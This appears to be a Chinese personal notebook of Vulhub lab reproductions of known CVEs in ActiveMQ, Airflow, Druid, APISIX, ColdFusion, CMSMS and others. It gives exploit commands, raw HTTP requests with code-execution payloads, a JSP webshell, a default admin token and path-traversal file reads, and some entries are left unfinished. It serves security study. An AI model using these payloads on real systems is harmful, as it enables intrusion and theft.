Vulhub记录（旧的）

一脚踹开src的大门

嘛 机缘巧合下开始练习src 总之先拿vulhub练练手
注释: 本来用的是docker纯本地搭建 效率太鸡肋了 换成在线网站搞flag的形式吧 没法getshell的会在这里继续更新

漏洞很多 试点经典的 基本按着readme做

总结遇到的问题

-我使用的环境是 docker for windows 因此会出现各种奇葩的问题 这里记录

换行符问题

关键词:(出现在常常闪退的容器环境的log中)

$'\r': command not found
syntax error: unexpected end of file

exec /docker-entrypoint.sh: no such file or directory （CVE-2019-14234）

vulhub下自带文件有些只考虑了linux的换行符/文件格式 下载到windows会被自动转换
我使用了Git Bash 自带的工具 dos2unix转换文件至unix格式 至此就能正常运行了

ActiveMQ 反序列化漏洞（CVE-2015-5254）

至于创建环境和搭建环境 请自行练习docker的操作

Apache ActiveMQ是美国阿帕奇（Apache）软件基金会所研发的一套开源的消息中间件，它支持Java消息服务、集群、Spring Framework等。
Apache ActiveMQ 5.13.0之前5.x版本中存在安全漏洞，该漏洞源于程序没有限制可在代理中序列化的类。远程攻击者可借助特制的序列化的Java Message Service(JMS)ObjectMessage对象利用该漏洞执行任意代码。

漏洞复现

漏洞利用过程如下：

1. 构造（可以使用ysoserial）可执行命令的序列化对象
2. 作为一个消息，发送给目标61616端口
3. 访问web管理页面，读取消息，触发漏洞
   使用jmet进行漏洞利用。首先下载jmet的jar文件，并在同目录下创建一个external文件夹（否则可能会爆文件夹不存在的错误）。
   jmet原理是使用ysoserial生成Payload并发送（其jar内自带ysoserial，无需再自己下载），所以我们需要在ysoserial是gadget中选择一个可以使用的，比如ROME。
4. 执行：

java -jar jmet-0.1.0-all.jar -Q event -I ActiveMQ -s -Y "touch /tmp/success" -Yp ROME your-ip 61616

在复现的时候遇到了问题 kali自带的java版本太高导致了报错 这里临时下个java8替换掉原版
我参考的教程

提示这样就完事了

此时会给目标ActiveMQ添加一个名为event的队列，我们可以通过http://your-ip:8161/admin/browse.jsp?JMSDestination=event看到这个队列中所有消息：

使用默认账号密码admin admin登录进去

点击查看这条消息即可触发命令执行，此时进入容器docker compose exec activemq bash，可见/tmp/success已成功创建，说明漏洞利用成功：

将命令替换成弹shell语句再利用：(我用的是windows环境下的docker就不试这个了)
值得注意的是，通过web管理页面访问消息并触发漏洞这个过程需要管理员权限。在没有密码的情况下，我们可以诱导管理员访问我们的链接以触发，或者伪装成其他合法服务需要的消息，等待客户端访问的时候触发。

ActiveMQ任意文件写入漏洞（CVE-2016-3088）

ActiveMQ的web控制台分三个应用，admin、api和fileserver，其中admin是管理员页面，api是接口，fileserver是储存文件的接口；admin和api都需要登录后才能使用，fileserver无需登录。
fileserver是一个RESTful API接口，我们可以通过GET、PUT、DELETE等HTTP请求对其中存储的文件进行读写操作，其设计目的是为了弥补消息队列操作不能传输、存储二进制文件的缺陷，但后来发现：
1.其使用率并不高
2.文件操作容易出现漏洞
所以，ActiveMQ在5.12.x~5.13.x版本中，已经默认关闭了fileserver这个应用（你可以在conf/jetty.xml中开启之）；在5.14.0版本以后，彻底删除了fileserver应用。
在测试过程中，可以关注ActiveMQ的版本，避免走弯路。

本漏洞出现在fileserver应用中，漏洞原理其实非常简单，就是fileserver支持写入文件（但不解析jsp），同时支持移动文件（MOVE请求）。所以，我们只需要写入一个文件，然后使用MOVE请求将其移动到任意位置，造成任意文件写入漏洞。
文件写入有几种利用方法：
1.写入webshell
2.写入cron或ssh key等文件
3.写入jar或jetty.xml等库和配置文件
写入webshell的好处是，门槛低更方便，但前面也说了fileserver不解析jsp，admin和api两个应用都需要登录才能访问，所以有点鸡肋；写入cron或ssh key，好处是直接反弹拿shell，也比较方便，缺点是需要root权限；写入jar，稍微麻烦点（需要jar的后门），写入xml配置文件，这个方法比较靠谱，但有个鸡肋点是：我们需要知道activemq的绝对路径。
分别说一下上述几种利用方法。

写入webshell

前面说了，写入webshell，需要写在admin或api应用中，而这俩应用都需要登录才能访问。

默认的ActiveMQ账号密码均为admin，首先访问http://your-ip:8161/admin/test/systemProperties.jsp，查看ActiveMQ的绝对路径：

然后上传webshell：

PUT /fileserver/2.txt HTTP/1.1
Host: localhost:8161
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
Content-Length: 120976

<%@ page import="java.io.*"%>
<%
 out.print("Hello</br>");
 String strcmd=request.getParameter("cmd");
 String line=null;
 Process p=Runtime.getRuntime().exec(strcmd);
 BufferedReader br=new BufferedReader(new InputStreamReader(p.getInputStream()));
 while((line=br.readLine())!=null){
 out.print(line+"</br>");
 }
%>

通过burpsuite的MOVE操作有点略难 这里试了几次有时会报400

移动到web目录下的api文件夹（/opt/activemq/webapps/api/s.jsp）中：

MOVE /fileserver/2.txt HTTP/1.1
Destination: file:///opt/activemq/webapps/api/s.jsp
Host: localhost:8161
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
Content-Length: 0

访问webshell（需要登录）：

Apache ActiveMQ Jolokia 后台远程代码执行漏洞（CVE-2022-41678）

Apache ActiveMQ 是美国阿帕奇（Apache）软件基金会所研发的一套开源的消息中间件，它支持Java消息服务、集群、Spring Framework等。

Apache ActiveMQ 在5.16.5, 5.17.3版本及以前，后台Jolokia存在一处任意文件写入导致的远程代码执行漏洞。

参考链接：

• https://activemq.apache.org/security-advisories.data/CVE-2022-41678-announcement.txt
• https://l3yx.github.io/2023/11/29/Apache-ActiveMQ-Jolokia-%E8%BF%9C%E7%A8%8B%E4%BB%A3%E7%A0%81%E6%89%A7%E8%A1%8C%E6%BC%8F%E6%B4%9E-CVE-2022-41678-%E5%88%86%E6%9E%90/

漏洞复现

首先，访问/api/jolokia/list这个API可以查看当前服务器里所有的MBeans： cv

是使用org.apache.logging.log4j.core.jmx.LoggerContextAdminMBean，这是由Log4j2提供的一个MBean。
攻击者使用这个MBean中的setConfigText操作可以更改Log4j的配置，进而将日志文件写入任意目录中。
使用poc脚本来复现完整的过程：

>python poc.py -u admin -p admin http://your-ip:8161

Webshell被写入在/admin/shell.jsp文件中：

这个方法受到ActiveMQ版本的限制，因为Log4j2是在5.17.0中才引入Apache ActiveMQ。

Apache ActiveMQ OpenWire 协议反序列化命令执行漏洞（CVE-2023-46604）

Apache ActiveMQ 是美国阿帕奇（Apache）软件基金会所研发的一套开源的消息中间件，它支持Java消息服务、集群、Spring Framework等。

OpenWire协议在ActiveMQ中被用于多语言客户端与服务端通信。在Apache ActiveMQ 5.18.2版本及以前，OpenWire协议通信过程中存在一处反序列化漏洞，该漏洞可以允许具有网络访问权限的远程攻击者通过操作 OpenWire 协议中的序列化类类型，导致代理的类路径上的任何类实例化，从而执行任意命令。

参考链接：

• https://activemq.apache.org/news/cve-2023-46604
• https://xz.aliyun.com/t/12929
• https://boogipop.com/2023/11/03/Apache%20ActiveMQ%20CVE-2023-46604%20RCE%20%E5%88%86%E6%9E%90/
• https://forum.butian.net/share/2566

漏洞复现

首先，启动一个HTTP反连服务器，其中包含我们的poc.xml：

python3 -m http.server 6666

然后，执行poc.py，传入的三个参数分别是目标服务器地址、端口，以及包含poc.xml的反连平台URL：

python3 poc.py target port http://ip of http server/poc.xml

执行完成后，进入ActiveMQ容器：

docker exec cve-2023-46604-activemq-1 ls -l /tmp

使用python开启http反连服务器时,目录即为命令行的开启目录

可见，touch /tmp/activeMQ-RCE-success已经被成功执行：

Adminer ElasticSearch 和 ClickHouse 错误页面SSRF漏洞（CVE-2021-21311）

Adminer是一个PHP编写的开源数据库管理工具，支持MySQL、MariaDB、PostgreSQL、SQLite、MS SQL、Oracle、Elasticsearch、MongoDB等数据库。

在其4.0.0到4.7.9版本之间，连接 ElasticSearch 和 ClickHouse 数据库时存在一处服务端请求伪造漏洞（SSRF）。

参考连接：

• https://github.com/vrana/adminer/security/advisories/GHSA-x5r2-hj5c-8jx6
• https://github.com/vrana/adminer/files/5957311/Adminer.SSRF.pdf
• https://github.com/projectdiscovery/nuclei-templates/blob/main/http/cves/2021/CVE-2021-21311.yaml

漏洞复现

在Adminer登录页面，选择ElasticSearch作为系统目标，并在server字段填写example.com，点击登录即可看到example.com返回的400错误页面展示在页面中：

Adminer远程文件读取（CVE-2021-43008）

Adminer是一个PHP编写的开源数据库管理工具，支持MySQL、MariaDB、PostgreSQL、SQLite、MS SQL、Oracle、Elasticsearch、MongoDB等数据库。

在其版本1.12.0到4.6.2之间存在一处因为MySQL LOAD DATA LOCAL导致的文件读取漏洞。

参考链接：

• https://github.com/p0dalirius/CVE-2021-43008-AdminerRead
• http://sansec.io/research/adminer-4.6.2-file-disclosure-vulnerability

漏洞复现

使用mysql-fake-server启动一个恶意的MySQL服务器。在Adminer登录页面中填写恶意服务地址和用户名fileread_/etc/passwd：

可见，我们已经收到客户端连接，读取到的文件/etc/passwd已保存至当前目录：

我这里怎么试都没法返回passwd文件…无奈放弃了

看起来多半是文件为空导致无法返回 怪欸

Apache Airflow 示例dag中的命令注入（CVE-2020-11978）

Apache Airflow是一款开源的，分布式任务调度框架。在其1.10.10版本及以前的示例DAG中存在一处命令注入漏洞，未授权的访问者可以通过这个漏洞在Worker中执行任意命令。

由于启动的组件比较多，可能会有点卡，运行此环境可能需要准备2G以上的内存。

参考链接：

• https://lists.apache.org/thread/cn57zwylxsnzjyjztwqxpmly0x9q5ljx
• https://github.com/pberba/CVE-2020-11978

漏洞复现

访问http://your-ip:8080进入airflow管理端，将example_trigger_target_dag前面的Off改为On：

再点击执行按钮，在Configuration JSON中输入：{"message":"'\";touch /tmp/airflow_dag_success;#"}，再点Trigger执行dag：

等几秒可以看到执行成功：
到CeleryWorker容器中进行查看：

可以看到成功创建了airflow_dag_success

Apache Airflow Celery 消息中间件命令执行（CVE-2020-11981）

Apache Airflow是一款开源的，分布式任务调度框架。在其1.10.10版本及以前，如果攻击者控制了Celery的消息中间件（如Redis/RabbitMQ），将可以通过控制消息，在Worker进程中执行任意命令。

由于启动的组件比较多，可能会有点卡，运行此环境可能需要准备2G以上的内存。

参考链接：

• https://lists.apache.org/thread/cn57zwylxsnzjyjztwqxpmly0x9q5ljx
• https://github.com/apache/airflow/pull/9178

漏洞复现

利用这个漏洞需要控制消息中间件，Vulhub环境中Redis存在未授权访问。通过未授权访问，攻击者可以下发自带的任务airflow.executors.celery_executor.execute_command来执行任意命令，参数为命令执行中所需要的数组。
我们可以使用exploit_airflow_celery.py这个小脚本来执行命令touch /tmp/airflow_celery_success：

pip install redis
python exploit_airflow_celery.py [your-ip]

查看结果：

docker compose logs airflow-worker

可以看到如下任务消息：

>docker compose exec airflow-worker ls -l /tmp

可以看到成功创建了文件airflow_celery_success：

AJ-Report 认证绕过与远程代码执行漏洞（CNVD-2024-15077）

AJ-Report是全开源的一个BI平台。在其1.4.0版本及以前，存在一处认证绕过漏洞，攻击者利用该漏洞可以绕过权限校验并执行任意代码。

参考链接：

• https://xz.aliyun.com/t/14460
• https://github.com/wy876/POC/blob/main/AJ-Report%E5%BC%80%E6%BA%90%E6%95%B0%E6%8D%AE%E5%A4%A7%E5%B1%8F%E5%AD%98%E5%9C%A8%E8%BF%9C%E7%A8%8B%E5%91%BD%E4%BB%A4%E6%89%A7%E8%A1%8C%E6%BC%8F%E6%B4%9E.md

漏洞复现

要利用该漏洞，只需要发送如下数据包：

POST /dataSetParam/verification;swagger-ui/ HTTP/1.1
Host: your-ip:9095
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate, br
Accept-Language: zh-CN,zh;q=0.9
Content-Type: application/json;charset=UTF-8
Connection: close
Content-Length: 339

{"ParamName":"","paramDesc":"","paramType":"","sampleItem":"1","mandatory":true,"requiredFlag":1,"validationRules":"function verification(data){a = new java.lang.ProcessBuilder(\"id\").start().getInputStream();r=new java.io.BufferedReader(new java.io.InputStreamReader(a));ss='';while((line = r.readLine()) != null){ss+=line};return ss;}"}

可见，id命令已经执行成功：

Apache Druid 代码执行漏洞（CVE-2021-25646）

Apache Druid是一个开源的分布式数据存储。

Apache Druid包括执行嵌入在各种类型请求中的用户提供的JavaScript代码的能力。这个功能是为了在可信环境下使用，并且默认是禁用的。然而，在Druid 0.20.0及以前的版本中，攻击者可以通过发送一个恶意请求使Druid用内置引擎执行任意JavaScript代码，而不管服务器配置如何，这将导致代码和命令执行漏洞。

参考链接：

• https://blogs.juniper.net/en-us/threat-research/cve-2021-25646-apache-druid-embedded-javascript-remote-code-execution
• https://mp.weixin.qq.com/s/McAoLfyf_tgFIfGTAoRCiw

漏洞复现

直接发送如下请求即可执行其中的JavaScript代码：

POST /druid/indexer/v1/sampler HTTP/1.1
Host: your-ip:8888
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en-US;q=0.9,en;q=0.8
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/110.0.5481.178 Safari/537.36
Connection: close
Cache-Control: max-age=0
Content-Type: application/json

{
    "type":"index",
    "spec":{
        "ioConfig":{
            "type":"index",
            "firehose":{
                "type":"local",
                "baseDir":"/etc",
                "filter":"passwd"
            }
        },
        "dataSchema":{
            "dataSource":"test",
            "parser":{
                "parseSpec":{
                "format":"javascript",
                "timestampSpec":{

                },
                "dimensionsSpec":{

                },
                "function":"function(){var a = new java.util.Scanner(java.lang.Runtime.getRuntime().exec([\"sh\",\"-c\",\"id\"]).getInputStream()).useDelimiter(\"\\A\").next();return {timestamp:123123,test: a}}",
                "":{
                    "enabled":"true"
                }
                }
            }
        }
    },
    "samplerConfig":{
        "numRows":10
    }
}

可见，id命令已被成功执行：

Apereo CAS 4.1 反序列化命令执行漏洞

Apereo CAS是一款Apereo发布的集中认证服务平台，常被用于企业内部单点登录系统。其4.1.7版本之前存在一处默认密钥的问题，利用这个默认密钥我们可以构造恶意信息触发目标反序列化漏洞，进而执行任意命令。

参考链接：

• https://apereo.github.io/2016/04/08/commonsvulndisc/

漏洞复现

漏洞原理实际上是Webflow中使用了默认密钥changeit：

public class EncryptedTranscoder implements Transcoder {
    private CipherBean cipherBean;
    private boolean compression = true;

    public EncryptedTranscoder() throws IOException {
        BufferedBlockCipherBean bufferedBlockCipherBean = new BufferedBlockCipherBean();
        bufferedBlockCipherBean.setBlockCipherSpec(new BufferedBlockCipherSpec("AES", "CBC", "PKCS7"));
        bufferedBlockCipherBean.setKeyStore(this.createAndPrepareKeyStore());
        bufferedBlockCipherBean.setKeyAlias("aes128");
        bufferedBlockCipherBean.setKeyPassword("changeit");
        bufferedBlockCipherBean.setNonce(new RBGNonce());
        this.setCipherBean(bufferedBlockCipherBean);
    }

    // ...

我们使用Apereo-CAS-Attack来复现这个漏洞。使用ysoserial的CommonsCollections4生成加密后的Payload：

java -jar apereo-cas-attack-1.0-SNAPSHOT-all.jar CommonsCollections4 "touch /tmp/success"

然后我们登录CAS并抓包，将Body中的execution值替换成上面生成的Payload发送：

POST /cas/login HTTP/1.1
Host: your-ip
Content-Length: 2287
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
Origin: http://your-ip:8080
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/84.0.4147.89 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Referer: http://your-ip:8080/cas/login
Accept-Encoding: gzip, deflate
Accept-Language: en,zh-CN;q=0.9,zh;q=0.8
Cookie: JSESSIONID=24FB4BAAE1A66E8B76D521EE366B3E12; _ga=GA1.1.1139210877.1586367734
Connection: close

username=test&password=test&lt=LT-2-gs2epe7hUYofoq0gI21Cf6WZqMiJyj-cas01.example.org&execution=[payload]&_eventId=submit&submit=LOGIN

登录Apereo CAS，可见touch /tmp/success已成功执行：

Apache APISIX 默认密钥漏洞（CVE-2020-13945）

Apache APISIX是一个高性能API网关。在用户未指定管理员Token或使用了默认配置文件的情况下，Apache APISIX将使用默认的管理员Token edd1c9f034335f136f87ad84b625c8f1，攻击者利用这个Token可以访问到管理员接口，进而通过script参数来插入任意LUA脚本并执行。

参考链接：

• https://apisix.apache.org/docs/apisix/getting-started
• https://github.com/apache/apisix/pull/2244
• https://seclists.org/oss-sec/2020/q4/187

漏洞复现

利用默认Token增加一个恶意的router，其中包含恶意LUA脚本：

POST /apisix/admin/routes HTTP/1.1
Host: your-ip:9080
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/97.0.4692.71 Safari/537.36
Connection: close
X-API-KEY: edd1c9f034335f136f87ad84b625c8f1
Content-Type: application/json
Content-Length: 406

{
    "uri": "/attack",
"script": "local _M = {} \n function _M.access(conf, ctx) \n local os = require('os')\n local args = assert(ngx.req.get_uri_args()) \n local f = assert(io.popen(args.cmd, 'r'))\n local s = assert(f:read('*a'))\n ngx.say(s)\n f:close()  \n end \nreturn _M",
    "upstream": {
        "type": "roundrobin",
        "nodes": {
            "example.com:80": 1
        }
    }
}

然后，我们访问刚才添加的router，就可以通过cmd参数执行任意命令：

http://your-ip:9080/attack?cmd=id

Apache APISIX Dashboard API权限绕过导致RCE（CVE-2021-45232）(未完成)

Apache APISIX是一个动态、实时、高性能API网关，而Apache APISIX Dashboard是一个配套的前端面板。

Apache APISIX Dashboard 2.10.1版本前存在两个API/apisix/admin/migrate/export和/apisix/admin/migrate/import，他们没有经过droplet框架的权限验证，导致未授权的攻击者可以导出、导入当前网关的所有配置项，包括路由、服务、脚本等。攻击者通过导入恶意路由，可以用来让Apache APISIX访问任意网站，甚至执行LUA脚本。

参考链接：

• https://apisix.apache.org/zh/blog/2021/12/28/dashboard-cve-2021-45232/
• https://github.com/wuppp/cve-2021-45232-exp

漏洞复现

先用默认账号密码admin/vulhub来登录网站

注:默认账号密码可能会因为镜像版本不同而有变化 具体还请查看容器目录下的comfig.yaml

登陆完之后进入路由页面 新建一个路由


至于相关设置直接随意 快速下一步到创建就行了
在访问了网站的/apisix/admin/migrate/export目录后获取了一个bak文件 查看后可以发现我们刚刚配置的路由信息被泄露了
剩下的过程不好复现 先暂且跳过

AppWeb认证绕过漏洞（CVE-2018-8715)

AppWeb是Embedthis Software LLC公司负责开发维护的一个基于GPL开源协议的嵌入式Web Server。他使用C/C++来编写，能够运行在几乎先进所有流行的操作系统上。当然他最主要的应用场景还是为嵌入式设备提供Web Application容器。

AppWeb可以进行认证配置，其认证方式包括以下三种：

• basic 传统HTTP基础认证
• digest 改进版HTTP基础认证，认证成功后将使用Cookie来保存状态，而不用再传递Authorization头
• form 表单认证

其7.0.3之前的版本中，对于digest和form两种认证方式，如果用户传入的密码为null（也就是没有传递密码参数），appweb将因为一个逻辑错误导致直接认证成功，并返回session。

参考链接：

• https://ssd-disclosure.com/index.php/archives/3676

漏洞复现

利用该漏洞需要知道一个已存在的用户名，当前环境下用户名为admin。

构造头Authorization: Digest username=admin，并发送如下数据包：

GET / HTTP/1.1
Host: example.com
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
Authorization: Digest username=admin

可见，因为我们没有传入密码字段，所以服务端出现错误，直接返回了200，且包含一个session：

设置这个session到浏览器，即可正常访问需要认证的页面：

Aria2 任意文件写入漏洞 （未完成）

Aria2是一个命令行下轻量级、多协议、多来源的下载工具（支持 HTTP/HTTPS、FTP、BitTorrent、Metalink），内建XML-RPC和JSON-RPC接口。在有权限的情况下，我们可以使用RPC接口来操作aria2来下载文件，将文件下载至任意目录，造成一个任意文件写入漏洞。

参考文章：[https://paper.seebug.org/120/][1]

漏洞复现

因为rpc通信需要使用json或者xml，不太方便，所以我们可以借助第三方UI来和目标通信，如 http://binux.github.io/yaaw/demo/ 。

打开yaaw，点击配置按钮，填入运行aria2的目标域名：http://your-ip:6800/jsonrpc

这个多半需要公网环境… 回去再搞

Bash Shellshock 破壳漏洞（CVE-2014-6271）（未完成）

服务启动后，有两个页面http://your-ip:8080/victim.cgi和http://your-ip:8080/safe.cgi。其中safe.cgi是最新版bash生成的页面，victim.cgi是bash4.3生成的页面。

将payload附在User-Agent中访问victim.cgi：

User-Agent: () { foo; }; echo Content-Type: text/plain; echo; /usr/bin/id

命令成功被执行：

不知道为啥就是没有正常回显…

Cacti 前台命令注入漏洞（CVE-2022-46169）(未完成)

Cacti是一个服务器监控与管理平台。在其1.2.17-1.2.22版本中存在一处命令注入漏洞，攻击者可以通过X-Forwarded-For请求头绕过服务端校验并在其中执行任意命令。

参考链接：

• https://github.com/Cacti/cacti/security/advisories/GHSA-6p93-p743-35gf
• https://mp.weixin.qq.com/s/6crwl8ggMkiHdeTtTApv3A

8080端口的容器一开就死 跳了

Celery <4.0 Redis未授权访问+Pickle反序列化利用

Celery 是一个简单、灵活且可靠的分布式系统，用于处理大量消息，同时为操作提供维护此类系统所需的工具。它是一个专注于实时处理的任务队列，同时也支持任务调度。

在Celery < 4.0版本默认使用Pickle进行任务消息的序列化传递，当所用队列服务（比如Redis、RabbitMQ、RocketMQ等等等）存在未授权访问问题时，可利用Pickle反序列化漏洞执行任意代码。

漏洞复现

漏洞利用脚本exploit.py仅支持在python3下使用

pip install redis
python exploit.py [主机IP]

查看结果：

docker compose logs celery

CGI HTTPoxy漏洞（CVE-2016-5385）（未完成）

根据RFC 3875规定，CGI（fastcgi）要将用户传入的所有HTTP头都加上HTTP_前缀放入环境变量中，而恰好大多数类库约定俗成会提取环境变量中的HTTP_PROXY值作为HTTP代理地址。于是，恶意用户通过提交Proxy: http://evil.com这样的HTTP头，将使用缺陷类库的网站的代理设置为http://evil.com，进而窃取数据包中可能存在的敏感信息。

PHP5.6.24版本修复了该漏洞，不会再将Proxy放入环境变量中。本环境使用PHP 5.6.23为例。

当然，该漏洞不止影响PHP，所有以CGI或Fastcgi运行的程序理论上都受到影响。CVE-2016-5385是PHP的CVE，HTTPoxy所有的CVE编号如下：

• CVE-2016-5385: PHP
• CVE-2016-5386: Go
• CVE-2016-5387: Apache HTTP Server
• CVE-2016-5388: Apache Tomcat
• CVE-2016-6286: spiffy-cgi-handlers for CHICKEN
• CVE-2016-6287: CHICKEN’s http-client
• CVE-2016-1000104: mod_fcgi
• CVE-2016-1000105: Nginx cgi script
• CVE-2016-1000107: Erlang inets
• CVE-2016-1000108: YAWS
• CVE-2016-1000109: HHVM FastCGI
• CVE-2016-1000110: Python CGIHandler
• CVE-2016-1000111: Python Twisted
• CVE-2016-1000212: lighttpd

参考链接：

• https://httpoxy.org/aaaaahttp://www.laruence.com/2016/07/19/3101.html

CMS Made Simple (CMSMS) < 2.2.10 前台SQL注入漏洞（CVE-2019-9053）

CMS Made Simple（CMSMS）是一个免费的开放源码内容管理系统，为开发人员、程序员和网站所有者提供基于网络的开发和管理功能。

在 2.2.9.1 之前的版本中，CMS Made Simple 存在一个未验证的 SQL 注入漏洞，攻击者可利用该漏洞获取管理员密码或密码重置令牌。结合后台的 SSTI 漏洞（CVE-2021-26120），攻击者可在目标服务器上执行任意代码。

参考链接：

• https://www.exploit-db.com/exploits/46635
• https://srcincite.io/pocs/cve-2021-26120.py.txt

漏洞复现

先是配置
环境环境启动后，你需要访问http://your-ip/install.php并安装CMS服务。
安装过程请根据页面中的安装向导来进行，其中MySQL数据库的地址是db，数据库名是cmsms，账号和密码均为root。

使用https://www.exploit-db.com/exploits/46635中的脚本来利用SQL注入漏洞：

python2 poc.py -u http://127.0.0.1

注:kali自带python2 3 但是3运行该py会报错 2又缺一些组件 pip2又不自带 安装很是麻烦

等他程序自己把密码爆出来就完事了

CMS Made Simple (CMSMS) 前台代码执行漏洞（CVE-2021-26120）

CMS Made Simple（CMSMS）是一个免费的开放源码内容管理系统，为开发人员、程序员和网站所有者提供基于网络的开发和管理功能。

Smarty 3.1.39 之前的版本允许在 {function name= 子串后注入PHP代码，导致代码注入漏洞，该漏洞即为CVE-2021-26120。

CMS Made Simple 版本 <= 2.2.15，拥有设计师权限的用户可以在后台利用服务端模板注入漏洞，即为前面提到的CVE-2021-26120。

因此，如果CMSMS版本低于2.2.9.1，未授权的攻击者可以结合CVE-2019-9053和CVE-2021-26120漏洞，在服务器上执行任意代码。

参考链接：

• https://www.exploit-db.com/exploits/46635
• https://srcincite.io/pocs/cve-2021-26120.py.txt

漏洞复现

先是配置
环境环境启动后，你需要访问http://your-ip/install.php并安装CMS服务。
安装过程请根据页面中的安装向导来进行，其中MySQL数据库的地址是db，数据库名是cmsms，账号和密码均为root。

使用https://srcincite.io/pocs/cve-2021-26120.py.txt中分享的POC，可以使用SQL注入漏洞重置管理员密码，并执行任意命令：

python poc.py 127.0.0.1 / id

可见，id命令已被成功执行。

Adobe ColdFusion 文件读取漏洞（CVE-2010-2861）

Adobe ColdFusion是美国Adobe公司的一款动态Web服务器产品，其运行的CFML（ColdFusion Markup Language）是针对Web应用的一种程序设计语言。

Adobe ColdFusion 8、9版本中存在一处目录穿越漏洞，可导致未授权的用户读取服务器任意文件。

漏洞复现

直接访问http://your-ip:8500/CFIDE/administrator/enter.cfm?locale=../../../../../../../../../../etc/passwd%00en，即可读取文件/etc/passwd：

读取后台管理员密码http://your-ip:8500/CFIDE/administrator/enter.cfm?locale=../../../../../../../lib/password.properties%00en：

Adobe ColdFusion 反序列化漏洞（CVE-2017-3066）

Adobe ColdFusion是美国Adobe公司的一款动态Web服务器产品，其运行的CFML（ColdFusion Markup Language）是针对Web应用的一种程序设计语言。

Adobe ColdFusion中存在java反序列化漏洞。攻击者可利用该漏洞在受影响应用程序的上下文中执行任意代码或造成拒绝服务。以下版本受到影响：Adobe ColdFusion (2016 release) Update 3及之前的版本，ColdFusion 11 Update 11及之前的版本，ColdFusion 10 Update 22及之前的版本。

参考链接：

• https://codewhitesec.blogspot.com.au/2018/03/exploiting-adobe-coldfusion.html
• https://www.exploit-db.com/exploits/43993
• https://github.com/codewhitesec/ColdFusionPwn

漏洞复现

我们使用参考链接中的ColdFusionPwn工具来生成POC：

java -cp ColdFusionPwn-0.0.1-SNAPSHOT-all.jar:ysoserial-0.0.6-SNAPSHOT-all.jar com.codewhitesec.coldfusionpwn.ColdFusionPwner -e CommonsBeanutils1 'touch /tmp/success' poc.ser

POC生成于poc.ser文件中，将POC作为数据包body发送给http://your-ip:8500/flex2gateway/amf，Content-Type为application/x-amf：

这里burp用的是“粘贴文件至”来发送的数据包 不然容易出现错误

一般来说正常返回完文件也会被正常创建 但多半是ysoserial版本不对 没有正常创建

进入容器中，发现/tmp/success已成功创建：

将POC改成反弹命令，成功拿到shell：

Adobe ColdFusion 本地文件包含漏洞（CVE-2023-26360）

Adobe ColdFusion是美国Adobe公司的一款动态Web服务器产品，其运行的CFML（ColdFusion Markup Language）是针对Web应用的一种程序设计语言。

Adobe ColdFusion 2018 Update 15 和 2021 Update 5 版本及以前，存在一处文件包含漏洞。攻击者可以利用该漏洞在服务器上执行任意代码。

参考链接：

• https://xz.aliyun.com/t/13392

漏洞复现

发送如下请求即可读取文件/proc/self/environ：

POST /cf_scripts/scripts/ajax/ckeditor/plugins/filemanager/iedit.cfc?method=foo&_cfclient=true HTTP/1.1
Host: localhost:8500
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Language: zh-CN,zh;q=0.9
Connection: close
Content-Length: 82
Content-Type: application/x-www-form-urlencoded

_variables={"_metadata":{"classname":"../../../../../../../../proc/self/environ"}}

你可以在返回包中找到Adobe ColdFusion的根目录/opt/coldfusion/cfusion：

从../../../../../../../../opt/coldfusion/cfusion/lib/password.properties中读取服务器密码：

想要利用文件包含漏洞执行任意代码，需要先发送如下请求来写入CFM脚本：

POST /cf_scripts/scripts/ajax/ckeditor/plugins/filemanager/iedit.cfc?method=foo&_cfclient=true HTTP/1.1
Host: localhost:8500
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Language: zh-CN,zh;q=0.9
Connection: close
Content-Length: 67
Content-Type: application/x-www-form-urlencoded

_variables=<cfexecute name='id' outputFile='/tmp/success' ></cfexecute>

然后包含日志文件，执行该CFM代码：

POST /cf_scripts/scripts/ajax/ckeditor/plugins/filemanager/iedit.cfc?method=foo&_cfclient=true HTTP/1.1
Host: localhost:8500
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Language: zh-CN,zh;q=0.9
Connection: close
Content-Length: 111
Content-Type: application/x-www-form-urlencoded

_variables={"_metadata":{"classname":"../../../../../../../../opt/coldfusion/cfusion/logs/coldfusion-out.log"}}

可见，id命令的执行结果已经被写入/tmp/success：

Adobe ColdFusion XML 反序列化命令执行漏洞（CVE-2023-29300）

Adobe ColdFusion是美国Adobe公司的一款动态Web服务器产品，其运行的CFML（ColdFusion Markup Language）是针对Web应用的一种程序设计语言。

Adobe ColdFusion在2018.0.16、2021.0.6、2023.0.0.330468版本及以前，存在一处XML反序列化漏洞。攻击者可以利用该漏洞调用Java中任意setter方法，最终执行任意命令。

参考链接：

